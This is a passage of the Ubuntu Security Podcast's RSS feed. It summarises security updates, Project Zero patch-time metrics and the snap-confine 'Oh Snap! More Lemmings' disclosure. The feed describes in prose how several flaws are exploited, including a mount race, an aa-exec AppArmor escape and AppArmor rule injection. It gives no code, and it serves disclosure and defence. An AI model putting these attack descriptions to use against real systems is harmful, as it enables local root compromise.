<li><a href="https://ubuntu.com/security/CVE-2021-42008">CVE-2021-42008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38204">CVE-2021-38204</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3679">CVE-2021-3679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3612">CVE-2021-3612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3564">CVE-2021-3564</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3483">CVE-2021-3483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-34693">CVE-2021-34693</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28972">CVE-2021-28972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-0129">CVE-2021-0129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 - xenial GA + trusty ESM</li>
</ul>
<h3 id="usn-5302-1-linux-kernel--oem--vulnerabilities-03-57">[<a href="https://ubuntu.com/security/notices/USN-5302-1">USN-5302-1</a>] Linux kernel (OEM) vulnerabilities [03:57]</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24959">CVE-2022-24959</a> <!-- raw HTML omitted -->
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24448">CVE-2022-24448</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntu.com/security/CVE-2022-0435">CVE-2022-0435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44879">CVE-2021-44879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43976">CVE-2021-43976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.14 - focal OEM</li>
</ul>
<h3 id="usn-5288-1-expat-vulnerabilities-04-12">[<a href="https://ubuntu.com/security/notices/USN-5288-1">USN-5288-1</a>] Expat vulnerabilities [04:12]</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-25236">CVE-2022-25236</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25235">CVE-2022-25235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23990">CVE-2022-23990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23852">CVE-2022-23852</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22827">CVE-2022-22827</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22826">CVE-2022-22826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22825">CVE-2022-22825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22824">CVE-2022-22824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22823">CVE-2022-22823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22822">CVE-2022-22822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46143">CVE-2021-46143</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45960">CVE-2021-45960</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>XML parser written in C - used by a huge number of other applications
from audacity, avahi, ceph, dbus, gdb, git, fontconfig, python, mesa,
squid and a lot more</li>
<li>2 possible RCE vulns - possible to inject content into XML namespace
tags, and failure to validate encoding e.g. for UTF-8 in particular
contexts
<ul>
<li>critical severity according to upstream since if expat passes malformed
data back to the application could result in memory corruption etc -&gt;
RCE (thanks to upstream for the heads-up on the possible impact of
these)</li>
<li>Plus a bunch of DoS and other less severe bugs fixed too (stack
exhaustion, integer overflows when multi-gigabyte input is parsed etc)</li>
</ul>
</li>
</ul>
<h3 id="usn-5293-1-c3p0-vulnerability-05-41">[<a href="https://ubuntu.com/security/notices/USN-5293-1">USN-5293-1</a>] c3p0 vulnerability [05:41]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5427">CVE-2019-5427</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>JDBC connection pooling library</li>
<li>billion laughs attack (aka XML bomb) when parsing XML config via
recursive XML entity expansion - have one entity defined as 10 of the
previous entity - then do this 10 times - 1 billion copies of the
original entity - memory exhaustion</li>
<li>billion laughs comes from original PoC which used an entity called <code>lol</code>
which was defined as 10 copies of <code>lol8</code> which was defined as 10 copies of
<code>lol7</code> etc&hellip;</li>
</ul>
<h3 id="usn-5301-1-usn-5301-2-cyrus-sasl-vulnerability-06-44">[<a href="https://ubuntu.com/security/notices/USN-5301-1">USN-5301-1</a>, <a href="https://ubuntu.com/security/notices/USN-5301-2">USN-5301-2</a>] Cyrus SASL vulnerability [06:44]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24407">CVE-2022-24407</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SASL implementation for Cyrus IMAP server, used also by exim, ldap-utils,
mutt, php, postfix and others</li>
<li>SQL plugin failed to properly validate input - SQL injection</li>
</ul>
<h3 id="usn-5300-1-php-vulnerabilities-07-23">[<a href="https://ubuntu.com/security/notices/USN-5300-1">USN-5300-1</a>] PHP vulnerabilities [07:23]</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21707">CVE-2021-21707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9119">CVE-2017-9119</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9120">CVE-2017-9120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9118">CVE-2017-9118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-8923">CVE-2017-8923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9253">CVE-2015-9253</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>php 7 - 4 different DoS vulns, 1 memory corruption - crash/RCE and one
info leak</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="gpz-report-on-vulnerability-metrics-07-48">GPZ report on vulnerability metrics [07:48]</h3>
<ul>
<li><a href="https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html">https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html</a></li>
<li>Looks at vulns which GPZ has reported between Jan 2019 - Dec 2021 and how
fast they get patched</li>
<li>376 vulns
<ul>
<li>351 (93%) fixed, 14 (4%) wontfix, 11 (3%) unfixed</li>
<li>96 (26%) Microsoft, 85 (23%) Apple, 60 (16%) Google</li>
</ul>
</li>
<li>Strict 90-day deadline to fix and ship (with additional 14-day grace
period)</li>
<li>When looking at vulns, group by Vendor - Apple, MS, Google, Linux
(kernel), Adobe, Mozilla, Samsung, Oracle and Others
<ul>
<li>Others: includes both vendors: Apache, AWS, Canonical, Intel, Qualcomm,
RedHat etc, but also individual OSS projects: c-ares, git, glibc,
gnupg, libseccomp, systemd and more</li>
</ul>
</li>
<li>Time-to-patch:
<ul>
<li>Linux - 25 days on average</li>
<li>Google + Others - 44 days</li>
<li>Mozilla - 61</li>
<li>Adobe - 65</li>
<li>Apple - 69</li>
<li>Microsoft - 83</li>
<li>Oracle - 109</li>
</ul>
</li>
<li>If look by year - shows most vendors have gotten faster over time - but
in particular Linux and Others are twice as fast in 2021 cf. 2019
<ul>
<li>Good news for Ubuntu users as these encompass the Linux relevant vulns</li>
</ul>
</li>
<li>Also look into stats on Phone - comparing iOS, Android (Samsung), Android
(Google) - and all have a TTP of ~70 days</li>
<li>Then also dig into specifics of timelines for OSS projects, focusing on
browsers since can break down the process into 2 discrete steps:
<ul>
<li>time from report to a public patch being available</li>
<li>time from public patch to release</li>
</ul>
</li>
<li>And compare these across Chrome, WebKit and Firefox
<ul>
<li>Chrome is fastest overall at 30 days total, Firefox 38 days, WebKit 73</li>
<li>When looking at the two steps:
<ul>
<li>Chrome has a very short initial patch time - 5 days - but both WebKit
and Firefox are respectible with 12 and 17 days respectively</li>
<li>But release cycle of WebKit is so long (61 days)compared to Chrome
(25) and Firefox (21) that this significantly delays the time to
fixes being available to users</li>
<li>Also puts them at more risk, since once a patch is publicly
available, it is usually not too hard to engineer a PoC for motivated
researchers, so they then have 2 months to use this on average before
it is patched</li>
<li>WebKit is used for all web rendering on iOS so iPhone users are then
vulnerable for quite a while no matter what browser they use -
hopefully Apple get faster at doing WebKit releases</li>
<li>Compared to Firefox and Chrome - both 4 week cycle now</li>
<li>Is not enough to develop fixes - you actually have to get them into
the hands of users to protect them</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="ubuntu-20-dot-04-dot-4-lts-released-15-27">Ubuntu 20.04.4 LTS Released [15:27]</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2022-February/000277.html">https://lists.ubuntu.com/archives/ubuntu-announce/2022-February/000277.html</a></li>
</ul>
<p>The Ubuntu team is pleased to announce the release of Ubuntu 20.04.4 LTS
(Long-Term Support) for its Desktop, Server, and Cloud products, as well
as other flavours of Ubuntu with long-term support.</p>
<p>Like previous LTS series, 20.04.4 includes hardware enablement stacks
for use on newer hardware. This support is offered on all architectures.</p>
<p>Ubuntu Server defaults to installing the GA kernel; however you may
select the HWE kernel from the installer bootloader.</p>
<p>As usual, this point release includes many updates, and updated
installation media has been provided so that fewer updates will need to
be downloaded after installation. These include security updates and
corrections for other high-impact bugs, with a focus on maintaining
stability and compatibility with Ubuntu 20.04 LTS.</p>
<p>Kubuntu 20.04.4 LTS, Ubuntu Budgie 20.04.4 LTS, Ubuntu MATE 20.04.4 LTS,
Lubuntu 20.04.4 LTS, Ubuntu Kylin 20.04.4 LTS, Ubuntu Studio 20.04.4 LTS,
and Xubuntu 20.04.4 LTS are also now available. More details can be found
in their individual release notes:</p>
<p><a href="https://wiki.ubuntu.com/FocalFossa/ReleaseNotes#Official_flavours">https://wiki.ubuntu.com/FocalFossa/ReleaseNotes#Official_flavours</a></p>
<p>Maintenance updates will be provided for 5 years for Ubuntu Desktop,
Ubuntu Server, Ubuntu Cloud, and Ubuntu Core. All the remaining
flavours will be supported for 3 years. Additional security support is
available with ESM (Extended Security Maintenance).</p>
<ul>
<li><a href="https://wiki.ubuntu.com/FocalFossa/ReleaseNotes">https://wiki.ubuntu.com/FocalFossa/ReleaseNotes</a></li>
<li><a href="https://wiki.ubuntu.com/FocalFossa/ReleaseNotes/ChangeSummary/20.04.4">https://wiki.ubuntu.com/FocalFossa/ReleaseNotes/ChangeSummary/20.04.4</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E150.mp3" length="14301756" type="audio/mpeg" /><itunes:duration>1093</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 149
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-149/</link>
          <pubDate>Fri, 18 Feb 2022 16:51:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>049b00667dd855d980b93558e1eeaeeba9495d9ec9a4ea3b8136c6ed8684420a16e6815ec8b4d9f1465303622938dd9cb9b884d72662c599bae65009fbc5028b</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 149</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week Qualys dominate the week in security updates, disclosing details
  of 4 different SUID-root vulnerabilities, including Oh Snap! More Lemmings
  (Local Privilege Escalation in snap-confine), plus we look at updates for
  Firefox,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week Qualys dominate the week in security updates, disclosing details
  of 4 different SUID-root vulnerabilities, including Oh Snap! More Lemmings
  (Local Privilege Escalation in snap-confine), plus we look at updates for
  Firefox, cryptsetup and more.
  </itunes:summary>
        <description>  This week Qualys dominate the week in security updates, disclosing details
  of 4 different SUID-root vulnerabilities, including Oh Snap! More Lemmings
  (Local Privilege Escalation in snap-confine), plus we look at updates for
  Firefox, cryptsetup and more.
  </description>
        <googleplay:description>  This week Qualys dominate the week in security updates, disclosing details
  of 4 different SUID-root vulnerabilities, including Oh Snap! More Lemmings
  (Local Privilege Escalation in snap-confine), plus we look at updates for
  Firefox, cryptsetup and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Qualys dominate the week in security updates, disclosing details
of 4 different SUID-root vulnerabilities, including Oh Snap! More Lemmings
(Local Privilege Escalation in snap-confine), plus we look at updates for
Firefox, cryptsetup and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>23 unique CVEs addressed</p>
<h3 id="usn-5279-1-util-linux-vulnerabilities-00-59">[<a href="https://ubuntu.com/security/notices/USN-5279-1">USN-5279-1</a>] util-linux vulnerabilities [00:59]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3996">CVE-2021-3996</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3995">CVE-2021-3995</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>First 2 of number of vulns discovered by Qualys this week</li>
<li>umount and fusermount are both setuid root</li>
<li>An unprivileged user is allowed to unmount a FUSE filesystem which is
already mounted and which they own</li>
<li>libumount parses <code>/proc/self/mountinfo</code> to validate if is a FUSE fs</li>
<li>When a mount entry is deleted, the kernel appends <code>(deleted)</code> to the name
of it in the mount table</li>
<li>libumount strips this off when parsing <code>mountinfo</code> to get the actual path</li>
<li>so a user could mount a FUSE filesystem at a mountpoint with <code>(deleted)</code> in
the name - and then libumount will strip this off and umount the original
path - ie. could mount at <code>/tmp/ (deleted)</code> then call <code>umount /tmp</code> and this
will succeed</li>
<li>Fixed to drop support for this <code>(deleted)</code> suffix as this has not been used
by the kernel since December 2014</li>
<li>Also when checking the UID of the user (as the owner of the filesystem),
would do a string comparison on the UID of the user against the UID of
the filesystem - but would use the length of the users UID to do this
comparison - which means a user UID of 1000 would then be seen to match
against a file-systems UID of 10000 etc - so would allow a user to umount
filesystems owned by certain other users</li>
<li>Fixed to compare as a numerical value rather than strings</li>
</ul>
<h3 id="usn-5280-1-speex-vulnerability-04-41">[<a href="https://ubuntu.com/security/notices/USN-5280-1">USN-5280-1</a>] Speex vulnerability [04:41]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-23903">CVE-2020-23903</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Divide by zero from a crafted WAV file - trap - crash - DoS</li>
</ul>
<h3 id="usn-5284-1-firefox-vulnerabilities-04-56">[<a href="https://ubuntu.com/security/notices/USN-5284-1">USN-5284-1</a>] Firefox vulnerabilities [04:56]</h3>
<ul>
<li>9 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22757">CVE-2022-22757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22756">CVE-2022-22756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22754">CVE-2022-22754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22764">CVE-2022-22764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22761">CVE-2022-22761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22760">CVE-2022-22760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22759">CVE-2022-22759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22755">CVE-2022-22755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0511">CVE-2022-0511</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>97.0</li>
<li>Extensions could bypass update prompt and auto-update itself with extra
permissions</li>
<li>Drag and drop of a crafted image would make the resulting file
executable - could possibly use as RCE</li>
<li>WebDriver (remote control interface for firefox) failed to validate
Host/Origin headers - if visit malicious website with WebDriver enabled
could then allow attacker to connect back to the user&rsquo;s browser and take
control of it</li>
</ul>
<h3 id="usn-5286-1-cryptsetup-vulnerability-06-20">[<a href="https://ubuntu.com/security/notices/USN-5286-1">USN-5286-1</a>] cryptsetup vulnerability [06:20]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4122">CVE-2021-4122</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly validate the device header - local attacker with
physical access could modify this to trick cryptsetup to reencrypt the
device on next mount - but reencrypt it with no encryption enabled -
ie. decrypt it in place</li>
<li>Fixed by disabling the online reencryption feature</li>
</ul>
<h3 id="usn-5267-3-linux-kernel--raspberry-pi--vulnerabilities-07-11">[<a href="https://ubuntu.com/security/notices/USN-5267-3">USN-5267-3</a>] Linux kernel (Raspberry Pi) vulnerabilities [07:11]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3752">CVE-2021-3752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3640">CVE-2021-3640</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-148/">Episode 148</a> - 2 vulns in bluetooth and one in Firewire subsystems - local
attacker crash / RCE - corresponding fixes for RPi on 20.04 or 18.04 with
HWE</li>
</ul>
<h3 id="usn-5291-1-libarchive-vulnerabilities-07-36">[<a href="https://ubuntu.com/security/notices/USN-5291-1">USN-5291-1</a>] libarchive vulnerabilities [07:36]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-36976">CVE-2021-36976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31566">CVE-2021-31566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23177">CVE-2021-23177</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in symlink handling - would follow symlinks when changing
modes/times/ACLs on files when extracting a crafted archive - could allow
an attacker to modify these attributes on files outside of the archive</li>
<li>Memory corruption when parsing RAR archive - DoS/RCE</li>
</ul>
<h3 id="usn-5292-1-snapd-vulnerabilities-08-27">[<a href="https://ubuntu.com/security/notices/USN-5292-1">USN-5292-1</a>] snapd vulnerabilities [08:27]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44731">CVE-2021-44731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44730">CVE-2021-44730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4120">CVE-2021-4120</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3155">CVE-2021-3155</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>More Qualys issues in setuid root binary - snap-confine - plus 2 issues
discovered by Canonical - 1 from Ian Johnson of the snapd team, and 1
from James Troup of the BootStack team</li>
</ul>
<h2 id="oh-snap-more-lemmings--local-privilege-escalation-in-snap-confine--09-01">Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine) [09:01]</h2>
<ul>
<li>
<p><a href="https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt">https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt</a></p>
</li>
<li>
<p>Qualys appear to have been auditing various SUID-root binaries - recently
looked at snap-confine - low-level application, written in C, and used by
snapd to setup the execution environment for a snap application - as the
name suggests, it setups up the confinement for an application, creating
a separate mount namespace with own private <code>/tmp</code> and <code>/dev/pts</code> - as well
as any other mounts through content interfaces or layouts etc defined by
the snap, plus loading of seccomp syscall filters for the resulting snap</p>
</li>
<li>
<p>As such requires root privileges, hence is SUID-root - high value target</p>
</li>
<li>
<p>Very defensively programmed itself, plus is confined by seccomp and
AppArmor itself</p>
</li>
<li>
<p>Nonetheless, even the most carefully programmed software can have issues</p>
</li>
<li>
<p>2 vulns:</p>
<ul>
<li>hardlink attack (requires a non-standard configuration where system
admin disabled usual hardlink protections)</li>
<li>race-condition when creating mount namespace - allows an unprivileged
user to inject their own malicious libraries into the snap execution
environment and have these get executed by snap-confine itself to gain
root privesc</li>
</ul>
</li>
<li>
<p>Qualys liken these vulnerabilities (or the process to finding them) as
like playing the original Lemmings game, due to the complex nature of
steps required to thwart the defense-in-depth construction of
snap-confine</p>
</li>
<li>
<p>Not the first time snap-confine has been audited - SuSE Security Team
previously audited it in 2019 and found a couple issues, in particular in
some of the same code sections as these</p>
</li>
<li>
<p>Back to these vulns:</p>
<ul>
<li>
<p>When creating or deleting the mount namespace, snap-confine uses 2
helper programs written in Go - these are installed in the same
location as snap-confine, so it looks them up from the same directory
where it is running itself - however, since (when <code>protected_hardlinks</code>
is disabled) an unprivileged user could hardlink snap-confine into say
<code>/tmp</code> they could also then place their own malicious binary in place of
these helpers and have that get executed by snap-confine instead</p>
</li>
<li>
<p>NOTE: <code>protected_hardlinks</code> is enabled by default on almost all distros
so unless this has been changed by the system admin, this is unable to
be exploited in reality</p>
</li>
<li>
<p>Other vuln is a race condition when creating the private mount
namespace for the snap - snap-confine creates a per-snap private
directory under <code>/tmp</code> - this is a known &ldquo;dangerous&rdquo; thing to do since
<code>/tmp</code> is world writable so users could easily try and symlink their own
contents into it etc</p>
</li>
<li>
<p>snap-confine is very careful then to try and ensure this directory is
owned by root and to then avoid following symlinks when traversing this
hierarchy etc</p>
</li>
<li>
<p>However, when then doing the actual <code>mount()</code> syscall to start setting up
the mount namespace inside this directory, the absolute path of this
directory is given to <code>mount()</code> (since sadly there is no <code>mountat()</code> or
similar syscall) - which then <strong>does</strong> follow symlinks allowing a user who
an race the creation of this directory with snap-confine to be able to
take control of the contents of it, and hence inject their own
libraries and configuration such that a malicious library can be
preloaded into a subsequent execution of snap-confine - and since
snap-confine will then still run as root, this allows to get root code
execution</p>
</li>
</ul>
</li>
<li>
<p>In both cases, the use of AppArmor by default tries to isolate
snap-confine - and snap-confine is programmed defensively such that it
will refuse to execute if it is not confined by AppArmor - however, the
checks for this were not strict enough, and Qualys found they could use
<code>aa-exec</code> to execute snap-confine under a separate, more permissive
AppArmor profile to escape these restrictions</p>
</li>
<li>
<p>Fixes for these issues were numerous - to both add additional hardening
to snap-confine so that it would validate the AppArmor profile it
executes under is the one that is expected - plus the actual fixes for
the vulnerabilities themselves, by checking <code>snap-confine</code> is located where
it expects to be (so it doesn&rsquo;t execute other arbitrary helpers), and to
also when setting up the mount namespace directory hierarchy, forcefully
try and move aside any existing parts that are not root owned so it can
create them afresh with known ownership/permissions so that unprivileged
users can&rsquo;t trick it with their own contents</p>
</li>
<li>
<p>As mentioned, also includes fixes for 2 other issues identified by
Canonical - open permissions on snap per-user HOME/private storage allows
other users to potentially access private info stored by snaps</p>
</li>
<li>
<p>Plus a more sinister issue in the handling of AppArmor rules for snaps</p>
</li>
<li>
<p>A snap can define a content interface - way of making files available to
other snaps - snaps can then connect to this to access that content -
often used to implement plugins or other such concepts between snaps</p>
</li>
<li>
<p>When creating an AppArmor profile for a snap, adds additional rules then
to allow access to these paths within the other snap</p>
</li>
<li>
<p>Included code to validate that a snap wasn&rsquo;t trying to expose content it
shouldn&rsquo;t BUT didn&rsquo;t validate that these were just paths and nothing else</p>
</li>
<li>
<p>Since AppArmor policy is human-readable text files, these get generated
by snapd by adding the content interface paths into the policy</p>
</li>
<li>
<p>Content interface path could then contain additional AppArmor policy
directives and these would get included in the generated profile</p>
</li>
<li>
<p>Since any snap can specify content interfaces, and they get
auto-connected by snaps from the same publisher, would then just have to
get a user to install 2 malicious snaps from the same publisher where one
declares a malicious interface like this and then the snaps will be able
to escape the usual strict confinement provided by AppArmor</p>
</li>
<li>
<p>Fixed in snapd to both validate paths more correctly, and to also quote
all file-system paths in the generated AppArmor policies so that
arbitrary rules cannot be specified</p>
</li>
</ul>
<!-- raw HTML omitted -->
<ul>
<li>
<p>Shows that the defence-in-depth approach is still worthwhile - Qualys
mentions they nearly gave up looking for vulns and then on trying to
exploit them due to just how hard the task appeared given all the
defensive measures they would have to overcome</p>
</li>
<li>
<p>Want to thank Qualys for all their efforts in disclosing vulns and in
providing feedback on proposed fixes etc, and the snapd team for all
their help on finding and remediating the vulnerability with content
interface / layout paths, plus on preparing and delivering this update</p>
</li>
<li>
<p>Has been in the works for a while, glad it is finally out</p>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E149.mp3" length="17455504" type="audio/mpeg" /><itunes:duration>23:39</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 148
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-148/</link>
          <pubDate>Fri, 11 Feb 2022 14:28:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>ce857e7d7a09a0b56595d872e5549a8deb4fd7f8ac0327fc458e59e1bed0a03d97610c76b48f88a9c2a1fd70a8db50a1d95551bd38d0ae4fd521c76e2aee937f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 148</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          It's main vs universe as we take a deep dive into the Ubuntu archive and
  look at these components plus what goes into each and how the security team
  goes about reviewing software destined for main, plus we cover security
  updates for...
        
        ]]></itunes:subtitle>
        <itunes:summary>  It's main vs universe as we take a deep dive into the Ubuntu archive and
  look at these components plus what goes into each and how the security team
  goes about reviewing software destined for main, plus we cover security
  updates for Django, BlueZ, NVIDIA Graphics Drivers and more.
  </itunes:summary>
        <description>  It's main vs universe as we take a deep dive into the Ubuntu archive and
  look at these components plus what goes into each and how the security team
  goes about reviewing software destined for main, plus we cover security
  updates for Django, BlueZ, NVIDIA Graphics Drivers and more.
  </description>
        <googleplay:description>  It's main vs universe as we take a deep dive into the Ubuntu archive and
  look at these components plus what goes into each and how the security team
  goes about reviewing software destined for main, plus we cover security
  updates for Django, BlueZ, NVIDIA Graphics Drivers and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>It&rsquo;s main vs universe as we take a deep dive into the Ubuntu archive and
look at these components plus what goes into each and how the security team
